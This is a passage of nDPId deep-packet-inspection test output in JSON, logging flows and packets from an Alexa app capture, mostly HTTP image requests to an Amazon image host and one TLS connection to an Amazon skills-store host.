-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1490976134141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134141,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xZVAAEAGKrKsECrYNFQ\/OMsSAFCeYrcjAAAAAKAC\/\/9o9QAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134144,"flow_last_seen":1490976134144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134144,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1490976134144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134144,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85X5AAEAGCsmsECrYNFQ\/OMsTAFDQ0pfIAAAAAKAC\/\/9V3wAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134146,"flow_last_seen":1490976134146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134146,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1490976134146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134146,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TQZAAEAGo0GsECrYNFQ\/OMsUAFAHRT+wAAAAAKAC\/\/93hAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134148,"flow_last_seen":1490976134148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134148,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1490976134148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134148,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8vDBAAEAGNBesECrYNFQ\/OMsVAFCK3c6GAAAAAKAC\/\/9lFAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134149,"flow_last_seen":1490976134149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1490976134149,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134149,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EjJAAEAG3hWsECrYNFQ\/OMsWAFAy6mCEAAAAAKAC\/\/8rCQAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2040,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1490976134198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134198,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxXC1q1Wit3Oh6AScSCcZgAAAgQFtAQCCAps+npUAPZytgEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2041,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxSwmxNdB0U\/saAScSBYswAAAgQFtAQCCAps+nysAPZytgEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2042,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxG999POw2qqP6AScSBjDwAAAgQFtAQCCAps+n3SAPZytQEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 